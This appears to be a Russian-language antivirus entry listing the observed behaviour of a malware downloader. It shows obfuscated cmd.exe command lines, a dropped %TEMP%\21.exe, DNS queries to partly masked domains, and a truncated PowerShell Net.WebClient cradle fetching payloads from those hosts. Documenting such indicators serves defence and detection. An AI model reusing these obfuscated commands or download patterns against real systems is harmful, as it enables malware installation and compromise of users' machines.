Техническая информация
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set dn7l=O\G,RF{0-U.Eqy5jDa9d\bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,3...
- %TEMP%\21.exe
- %TEMP%\21.exe
- 'cr######etinternational.com':80
- 'ma####sexchange.com':80
- 'ho####fashioon.my':80
- DNS ASK cr######etinternational.com
- DNS ASK ma####sexchange.com
- DNS ASK me####aclinic.com
- DNS ASK ja#####howdharyblog.com
- DNS ASK ho####fashioon.my
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set dn7l=O\G,RF{0-U.Eqy5jDa9d\bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,3...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set dn7l=O\G,RF{0-U.Eqy5jDa9d/bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,37,59,51,11,51,51,34,0,71,71,41,42,11,31,...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $vfovv='cifb';$wipjb=new-object Net.WebClient;$nsqrs='http://cr######etinternational.com/gWybm7Y@http://madocksexchange.com/yg...
- '<SYSTEM32>\cmd.exe'